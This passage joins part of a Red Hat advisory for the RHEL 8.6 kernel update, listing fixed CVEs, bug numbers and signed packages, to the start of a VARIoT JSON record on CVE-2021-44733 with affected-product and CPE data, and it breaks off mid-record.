  • kernel: out-of-bounds read in bpf_skb_change_head() of filter.c due to a use-after-free (CVE-2021-0941)

  • kernel: joydev: zero size passed to joydev_handle_JSIOCSBTNMAP() (CVE-2021-3612)

  • kernel: reading /proc/sysvipc/shm does not scale with large shared memory segment counts (CVE-2021-3669)

  • kernel: out-of-bound Read in qrtr_endpoint_post in net/qrtr/qrtr.c (CVE-2021-3743)

  • kernel: crypto: ccp - fix resource leaks in ccp_run_aes_gcm_cmd() (CVE-2021-3744)

  • kernel: possible use-after-free in bluetooth module (CVE-2021-3752)

  • kernel: unaccounted ipc objects in Linux kernel lead to breaking memcg limits and DoS attacks (CVE-2021-3759)

  • kernel: DoS in ccp_run_aes_gcm_cmd() function (CVE-2021-3764)

  • kernel: sctp: Invalid chunks may be used to remotely remove existing associations (CVE-2021-3772)

  • kernel: lack of port sanity checking in natd and netfilter leads to exploit of OpenVPN clients (CVE-2021-3773)

  • kernel: possible leak or coruption of data residing on hugetlbfs (CVE-2021-4002)

  • kernel: security regression for CVE-2018-13405 (CVE-2021-4037)

  • kernel: Buffer overwrite in decode_nfs_fh function (CVE-2021-4157)

  • kernel: cgroup: Use open-time creds and namespace for migration perm checks (CVE-2021-4197)

  • kernel: Race condition in races in sk_peer_pid and sk_peer_cred accesses (CVE-2021-4203)

  • kernel: new DNS Cache Poisoning Attack based on ICMP fragment needed packets replies (CVE-2021-20322)

  • kernel: arm: SIGPAGE information disclosure vulnerability (CVE-2021-21781)

  • hw: cpu: LFENCE/JMP Mitigation Update for CVE-2017-5715 (CVE-2021-26401)

  • kernel: Local privilege escalation due to incorrect BPF JIT branch displacement computation (CVE-2021-29154)

  • kernel: use-after-free in hso_free_net_device() in drivers/net/usb/hso.c (CVE-2021-37159)

  • kernel: eBPF multiplication integer overflow in prealloc_elems_and_freelist() in kernel/bpf/stackmap.c leads to out-of-bounds write (CVE-2021-41864)

  • kernel: Heap buffer overflow in firedtv driver (CVE-2021-42739)

  • kernel: ppc: kvm: allows a malicious KVM guest to crash the host (CVE-2021-43056)

  • kernel: an array-index-out-bounds in detach_capi_ctr in drivers/isdn/capi/kcapi.c (CVE-2021-43389)

  • kernel: mwifiex_usb_recv() in drivers/net/wireless/marvell/mwifiex/usb.c allows an attacker to cause DoS via crafted USB device (CVE-2021-43976)

  • kernel: use-after-free in the TEE subsystem (CVE-2021-44733)

  • kernel: information leak in the IPv6 implementation (CVE-2021-45485)

  • kernel: information leak in the IPv4 implementation (CVE-2021-45486)

  • hw: cpu: intel: Branch History Injection (BHI) (CVE-2022-0001)

  • hw: cpu: intel: Intra-Mode BTI (CVE-2022-0002)

  • kernel: Local denial of service in bond_ipsec_add_sa (CVE-2022-0286)

  • kernel: DoS in sctp_addto_chunk in net/sctp/sm_make_chunk.c (CVE-2022-0322)

  • kernel: FUSE allows UAF reads of write() buffers, allowing theft of (partial) /etc/shadow hashes (CVE-2022-1011)

  • kernel: use-after-free in nouveau kernel module (CVE-2020-27820)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Additional Changes:

For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.6 Release Notes linked from the References section.

  1. Solution:

For details on how to apply this update, which includes the changes described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

  1. Bugs fixed (https://bugzilla.redhat.com/):

1888433 - CVE-2020-4788 kernel: speculation on incompletely validated data on IBM Power9 1901726 - CVE-2020-27820 kernel: use-after-free in nouveau kernel module 1919791 - CVE-2020-0404 kernel: avoid cyclic entity chains due to malformed USB descriptors 1946684 - CVE-2021-29154 kernel: Local privilege escalation due to incorrect BPF JIT branch displacement computation 1951739 - CVE-2021-42739 kernel: Heap buffer overflow in firedtv driver 1957375 - [RFE] x86, tsc: Add kcmdline args for skipping tsc calibration sequences 1974079 - CVE-2021-3612 kernel: joydev: zero size passed to joydev_handle_JSIOCSBTNMAP() 1981950 - CVE-2021-21781 kernel: arm: SIGPAGE information disclosure vulnerability 1983894 - Hostnetwork pod to service backed by hostnetwork on the same node is not working with OVN Kubernetes 1985353 - CVE-2021-37159 kernel: use-after-free in hso_free_net_device() in drivers/net/usb/hso.c 1986473 - CVE-2021-3669 kernel: reading /proc/sysvipc/shm does not scale with large shared memory segment counts 1994390 - FIPS: deadlock between PID 1 and "modprobe crypto-jitterentropy_rng" at boot, preventing system to boot 1997338 - block: update to upstream v5.14 1997467 - CVE-2021-3764 kernel: DoS in ccp_run_aes_gcm_cmd() function 1997961 - CVE-2021-3743 kernel: out-of-bound Read in qrtr_endpoint_post in net/qrtr/qrtr.c 1999544 - CVE-2021-3752 kernel: possible use-after-free in bluetooth module 1999675 - CVE-2021-3759 kernel: unaccounted ipc objects in Linux kernel lead to breaking memcg limits and DoS attacks 2000627 - CVE-2021-3744 kernel: crypto: ccp - fix resource leaks in ccp_run_aes_gcm_cmd() 2000694 - CVE-2021-3772 kernel: sctp: Invalid chunks may be used to remotely remove existing associations 2004949 - CVE-2021-3773 kernel: lack of port sanity checking in natd and netfilter leads to exploit of OpenVPN clients 2009312 - Incorrect system time reported by the cpu guest statistics (PPC only). 2009521 - XFS: sync to upstream v5.11 2010463 - CVE-2021-41864 kernel: eBPF multiplication integer overflow in prealloc_elems_and_freelist() in kernel/bpf/stackmap.c leads to out-of-bounds write 2011104 - statfs reports wrong free space for small quotas 2013180 - CVE-2021-43389 kernel: an array-index-out-bounds in detach_capi_ctr in drivers/isdn/capi/kcapi.c 2014230 - CVE-2021-20322 kernel: new DNS Cache Poisoning Attack based on ICMP fragment needed packets replies 2015525 - SCTP peel-off with SELinux and containers in OCP 2015755 - zram: zram leak with warning when running zram02.sh in ltp 2016169 - CVE-2020-13974 kernel: integer overflow in k_ascii() in drivers/tty/vt/keyboard.c 2017073 - CVE-2021-43056 kernel: ppc: kvm: allows a malicious KVM guest to crash the host 2017796 - ceph omnibus backport for RHEL-8.6.0 2018205 - CVE-2021-0941 kernel: out-of-bounds read in bpf_skb_change_head() of filter.c due to a use-after-free 2022814 - Rebase the input and HID stack in 8.6 to v5.15 2025003 - CVE-2021-43976 kernel: mwifiex_usb_recv() in drivers/net/wireless/marvell/mwifiex/usb.c allows an attacker to cause DoS via crafted USB device 2025726 - CVE-2021-4002 kernel: possible leak or coruption of data residing on hugetlbfs 2027239 - CVE-2021-4037 kernel: security regression for CVE-2018-13405 2029923 - CVE-2021-4083 kernel: fget: check that the fd still exists after getting a ref to it 2030476 - Kernel 4.18.0-348.2.1 secpath_cache memory leak involving strongswan tunnel 2030747 - CVE-2021-44733 kernel: use-after-free in the TEE subsystem 2031200 - rename(2) fails on subfolder mounts when the share path has a trailing slash 2034342 - CVE-2021-4157 kernel: Buffer overwrite in decode_nfs_fh function 2035652 - CVE-2021-4197 kernel: cgroup: Use open-time creds and namespace for migration perm checks 2036934 - CVE-2021-4203 kernel: Race condition in races in sk_peer_pid and sk_peer_cred accesses 2037019 - CVE-2022-0286 kernel: Local denial of service in bond_ipsec_add_sa 2039911 - CVE-2021-45485 kernel: information leak in the IPv6 implementation 2039914 - CVE-2021-45486 kernel: information leak in the IPv4 implementation 2042798 - [RHEL8.6][sfc] General sfc driver update 2042822 - CVE-2022-0322 kernel: DoS in sctp_addto_chunk in net/sctp/sm_make_chunk.c 2043453 - [RHEL8.6 wireless] stack & drivers general update to v5.16+ 2046021 - kernel 4.18.0-358.el8 async dirops causes write errors with namespace restricted caps 2048251 - Selinux is not allowing SCTP connection setup between inter pod communication in enforcing mode 2061700 - CVE-2021-26401 hw: cpu: LFENCE/JMP Mitigation Update for CVE-2017-5715 2061712 - CVE-2022-0001 hw: cpu: intel: Branch History Injection (BHI) 2061721 - CVE-2022-0002 hw: cpu: intel: Intra-Mode BTI 2064855 - CVE-2022-1011 kernel: FUSE allows UAF reads of write() buffers, allowing theft of (partial) /etc/shadow hashes

  1. Package List:

Red Hat Enterprise Linux BaseOS (v. 8):

Source: kernel-4.18.0-372.9.1.el8.src.rpm

aarch64: bpftool-4.18.0-372.9.1.el8.aarch64.rpm bpftool-debuginfo-4.18.0-372.9.1.el8.aarch64.rpm kernel-4.18.0-372.9.1.el8.aarch64.rpm kernel-core-4.18.0-372.9.1.el8.aarch64.rpm kernel-cross-headers-4.18.0-372.9.1.el8.aarch64.rpm kernel-debug-4.18.0-372.9.1.el8.aarch64.rpm kernel-debug-core-4.18.0-372.9.1.el8.aarch64.rpm kernel-debug-debuginfo-4.18.0-372.9.1.el8.aarch64.rpm kernel-debug-devel-4.18.0-372.9.1.el8.aarch64.rpm kernel-debug-modules-4.18.0-372.9.1.el8.aarch64.rpm kernel-debug-modules-extra-4.18.0-372.9.1.el8.aarch64.rpm kernel-debuginfo-4.18.0-372.9.1.el8.aarch64.rpm kernel-debuginfo-common-aarch64-4.18.0-372.9.1.el8.aarch64.rpm kernel-devel-4.18.0-372.9.1.el8.aarch64.rpm kernel-headers-4.18.0-372.9.1.el8.aarch64.rpm kernel-modules-4.18.0-372.9.1.el8.aarch64.rpm kernel-modules-extra-4.18.0-372.9.1.el8.aarch64.rpm kernel-tools-4.18.0-372.9.1.el8.aarch64.rpm kernel-tools-debuginfo-4.18.0-372.9.1.el8.aarch64.rpm kernel-tools-libs-4.18.0-372.9.1.el8.aarch64.rpm perf-4.18.0-372.9.1.el8.aarch64.rpm perf-debuginfo-4.18.0-372.9.1.el8.aarch64.rpm python3-perf-4.18.0-372.9.1.el8.aarch64.rpm python3-perf-debuginfo-4.18.0-372.9.1.el8.aarch64.rpm

noarch: kernel-abi-stablelists-4.18.0-372.9.1.el8.noarch.rpm kernel-doc-4.18.0-372.9.1.el8.noarch.rpm

ppc64le: bpftool-4.18.0-372.9.1.el8.ppc64le.rpm bpftool-debuginfo-4.18.0-372.9.1.el8.ppc64le.rpm kernel-4.18.0-372.9.1.el8.ppc64le.rpm kernel-core-4.18.0-372.9.1.el8.ppc64le.rpm kernel-cross-headers-4.18.0-372.9.1.el8.ppc64le.rpm kernel-debug-4.18.0-372.9.1.el8.ppc64le.rpm kernel-debug-core-4.18.0-372.9.1.el8.ppc64le.rpm kernel-debug-debuginfo-4.18.0-372.9.1.el8.ppc64le.rpm kernel-debug-devel-4.18.0-372.9.1.el8.ppc64le.rpm kernel-debug-modules-4.18.0-372.9.1.el8.ppc64le.rpm kernel-debug-modules-extra-4.18.0-372.9.1.el8.ppc64le.rpm kernel-debuginfo-4.18.0-372.9.1.el8.ppc64le.rpm kernel-debuginfo-common-ppc64le-4.18.0-372.9.1.el8.ppc64le.rpm kernel-devel-4.18.0-372.9.1.el8.ppc64le.rpm kernel-headers-4.18.0-372.9.1.el8.ppc64le.rpm kernel-modules-4.18.0-372.9.1.el8.ppc64le.rpm kernel-modules-extra-4.18.0-372.9.1.el8.ppc64le.rpm kernel-tools-4.18.0-372.9.1.el8.ppc64le.rpm kernel-tools-debuginfo-4.18.0-372.9.1.el8.ppc64le.rpm kernel-tools-libs-4.18.0-372.9.1.el8.ppc64le.rpm perf-4.18.0-372.9.1.el8.ppc64le.rpm perf-debuginfo-4.18.0-372.9.1.el8.ppc64le.rpm python3-perf-4.18.0-372.9.1.el8.ppc64le.rpm python3-perf-debuginfo-4.18.0-372.9.1.el8.ppc64le.rpm

s390x: bpftool-4.18.0-372.9.1.el8.s390x.rpm bpftool-debuginfo-4.18.0-372.9.1.el8.s390x.rpm kernel-4.18.0-372.9.1.el8.s390x.rpm kernel-core-4.18.0-372.9.1.el8.s390x.rpm kernel-cross-headers-4.18.0-372.9.1.el8.s390x.rpm kernel-debug-4.18.0-372.9.1.el8.s390x.rpm kernel-debug-core-4.18.0-372.9.1.el8.s390x.rpm kernel-debug-debuginfo-4.18.0-372.9.1.el8.s390x.rpm kernel-debug-devel-4.18.0-372.9.1.el8.s390x.rpm kernel-debug-modules-4.18.0-372.9.1.el8.s390x.rpm kernel-debug-modules-extra-4.18.0-372.9.1.el8.s390x.rpm kernel-debuginfo-4.18.0-372.9.1.el8.s390x.rpm kernel-debuginfo-common-s390x-4.18.0-372.9.1.el8.s390x.rpm kernel-devel-4.18.0-372.9.1.el8.s390x.rpm kernel-headers-4.18.0-372.9.1.el8.s390x.rpm kernel-modules-4.18.0-372.9.1.el8.s390x.rpm kernel-modules-extra-4.18.0-372.9.1.el8.s390x.rpm kernel-tools-4.18.0-372.9.1.el8.s390x.rpm kernel-tools-debuginfo-4.18.0-372.9.1.el8.s390x.rpm kernel-zfcpdump-4.18.0-372.9.1.el8.s390x.rpm kernel-zfcpdump-core-4.18.0-372.9.1.el8.s390x.rpm kernel-zfcpdump-debuginfo-4.18.0-372.9.1.el8.s390x.rpm kernel-zfcpdump-devel-4.18.0-372.9.1.el8.s390x.rpm kernel-zfcpdump-modules-4.18.0-372.9.1.el8.s390x.rpm kernel-zfcpdump-modules-extra-4.18.0-372.9.1.el8.s390x.rpm perf-4.18.0-372.9.1.el8.s390x.rpm perf-debuginfo-4.18.0-372.9.1.el8.s390x.rpm python3-perf-4.18.0-372.9.1.el8.s390x.rpm python3-perf-debuginfo-4.18.0-372.9.1.el8.s390x.rpm

x86_64: bpftool-4.18.0-372.9.1.el8.x86_64.rpm bpftool-debuginfo-4.18.0-372.9.1.el8.x86_64.rpm kernel-4.18.0-372.9.1.el8.x86_64.rpm kernel-core-4.18.0-372.9.1.el8.x86_64.rpm kernel-cross-headers-4.18.0-372.9.1.el8.x86_64.rpm kernel-debug-4.18.0-372.9.1.el8.x86_64.rpm kernel-debug-core-4.18.0-372.9.1.el8.x86_64.rpm kernel-debug-debuginfo-4.18.0-372.9.1.el8.x86_64.rpm kernel-debug-devel-4.18.0-372.9.1.el8.x86_64.rpm kernel-debug-modules-4.18.0-372.9.1.el8.x86_64.rpm kernel-debug-modules-extra-4.18.0-372.9.1.el8.x86_64.rpm kernel-debuginfo-4.18.0-372.9.1.el8.x86_64.rpm kernel-debuginfo-common-x86_64-4.18.0-372.9.1.el8.x86_64.rpm kernel-devel-4.18.0-372.9.1.el8.x86_64.rpm kernel-headers-4.18.0-372.9.1.el8.x86_64.rpm kernel-modules-4.18.0-372.9.1.el8.x86_64.rpm kernel-modules-extra-4.18.0-372.9.1.el8.x86_64.rpm kernel-tools-4.18.0-372.9.1.el8.x86_64.rpm kernel-tools-debuginfo-4.18.0-372.9.1.el8.x86_64.rpm kernel-tools-libs-4.18.0-372.9.1.el8.x86_64.rpm perf-4.18.0-372.9.1.el8.x86_64.rpm perf-debuginfo-4.18.0-372.9.1.el8.x86_64.rpm python3-perf-4.18.0-372.9.1.el8.x86_64.rpm python3-perf-debuginfo-4.18.0-372.9.1.el8.x86_64.rpm

Red Hat CodeReady Linux Builder (v. 8):

aarch64: bpftool-debuginfo-4.18.0-372.9.1.el8.aarch64.rpm kernel-debug-debuginfo-4.18.0-372.9.1.el8.aarch64.rpm kernel-debuginfo-4.18.0-372.9.1.el8.aarch64.rpm kernel-debuginfo-common-aarch64-4.18.0-372.9.1.el8.aarch64.rpm kernel-tools-debuginfo-4.18.0-372.9.1.el8.aarch64.rpm kernel-tools-libs-devel-4.18.0-372.9.1.el8.aarch64.rpm perf-debuginfo-4.18.0-372.9.1.el8.aarch64.rpm python3-perf-debuginfo-4.18.0-372.9.1.el8.aarch64.rpm

ppc64le: bpftool-debuginfo-4.18.0-372.9.1.el8.ppc64le.rpm kernel-debug-debuginfo-4.18.0-372.9.1.el8.ppc64le.rpm kernel-debuginfo-4.18.0-372.9.1.el8.ppc64le.rpm kernel-debuginfo-common-ppc64le-4.18.0-372.9.1.el8.ppc64le.rpm kernel-tools-debuginfo-4.18.0-372.9.1.el8.ppc64le.rpm kernel-tools-libs-devel-4.18.0-372.9.1.el8.ppc64le.rpm perf-debuginfo-4.18.0-372.9.1.el8.ppc64le.rpm python3-perf-debuginfo-4.18.0-372.9.1.el8.ppc64le.rpm

x86_64: bpftool-debuginfo-4.18.0-372.9.1.el8.x86_64.rpm kernel-debug-debuginfo-4.18.0-372.9.1.el8.x86_64.rpm kernel-debuginfo-4.18.0-372.9.1.el8.x86_64.rpm kernel-debuginfo-common-x86_64-4.18.0-372.9.1.el8.x86_64.rpm kernel-tools-debuginfo-4.18.0-372.9.1.el8.x86_64.rpm kernel-tools-libs-devel-4.18.0-372.9.1.el8.x86_64.rpm perf-debuginfo-4.18.0-372.9.1.el8.x86_64.rpm python3-perf-debuginfo-4.18.0-372.9.1.el8.x86_64.rpm

These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/

  1. Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1

iQIVAwUBYnqSF9zjgjWX9erEAQjBXQ/8DSpFUMNN6ZVFtli2KuVowVLS+14J0jtj 0zxpr0skJT8vVulU3VTeURBMdg9NAo9bj3R5KTk2+dC+AMuHET5aoVvaYmimBGKL 5qzpu7q9Z0aaD2I288suHCnYuRJnt+qKZtNa4hlcY92bN0tcYBonxsdIS2xM6xIu GHNS8HNVUNz4PuCBfmbITvgX9Qx+iZQVlVccDBG5LDpVwgOtnrxHKbe5E499v/9M oVoN+eV9ulHAZdCHWlUAahbsvEqDraCKNT0nHq/xO5dprPjAcjeKYMeaICtblRr8 k+IouGywaN+mW4sBjnaaiuw2eAtoXq/wHisX1iUdNkroqcx9NBshWMDBJnE4sxQJ ZOSc8B6yjJItPvUI7eD3BDgoka/mdoyXTrg+9VRrir6vfDHPrFySLDrO1O5HM5fO 3sExCVO2VM7QMCGHJ1zXXX4szk4SV/PRsjEesvHOyR2xTKZZWMsXe1h9gYslbADd tW0yco/G23xjxqOtMKuM/nShBChflMy9apssldiOfdqODJMv5d4rRpt0xgmtSOM6 qReveuQCasmNrGlAHgDwbtWz01fmSuk9eYDhZNmHA3gxhoHIV/y+wr0CLbOQtDxT p79nhiqwUo5VMj/X30Lu0Wl3ptLuhRWamzTCkEEzdubr8aVsT4RRNQU3KfVFfpT1 MWp/2ui3i80= =Fdgy -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce . 8) - x86_64

  1. Description:

The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202112-1696",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "9.0"
      },
      {
        "model": "fedora",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "fedoraproject",
        "version": "35"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.0"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "10.0"
      },
      {
        "model": "baseboard management controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "11.0"
      },
      {
        "model": "kernel",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.15.11"
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2021-44733"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "5.15.11",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:baseboard_management_controller_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:baseboard_management_controller:h300s:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:netapp:baseboard_management_controller_firmware:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:netapp:baseboard_management_controller:h300s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": false
              }
            ],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:baseboard_management_controller_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:baseboard_management_controller:h500s:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:netapp:baseboard_management_controller_firmware:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:netapp:baseboard_management_controller:h500s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": false
              }
            ],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:baseboard_management_controller_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:baseboard_management_controller:h700s:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:netapp:baseboard_management_controller_firmware:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:netapp:baseboard_management_controller:h700s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": false
              }
            ],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:baseboard_management_controller_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:baseboard_management_controller:h300e:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:netapp:baseboard_management_controller_firmware:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:netapp:baseboard_management_controller:h300e:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": false
              }
            ],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:baseboard_management_controller_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:baseboard_management_controller:h500e:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:netapp:baseboard_management_controller_firmware:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:netapp:baseboard_management_controller:h500e:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": false
              }
            ],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:baseboard_management_controller_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:baseboard_management_controller:h700e:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:netapp:baseboard_management_controller_firmware:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:netapp:baseboard_management_controller:h700e:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": false
              }
            ],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:baseboard_management_controller_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:baseboard_management_controller:h410s:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:netapp:baseboard_management_controller_firmware:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:netapp:baseboard_management_controller:h410s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": false
              }
            ],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:baseboard_management_controller_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:baseboard_management_controller:h410c:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:netapp:baseboard_management_controller_firmware:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:netapp:baseboard_management_controller:h410c:*:*:*:*:*:*:*",
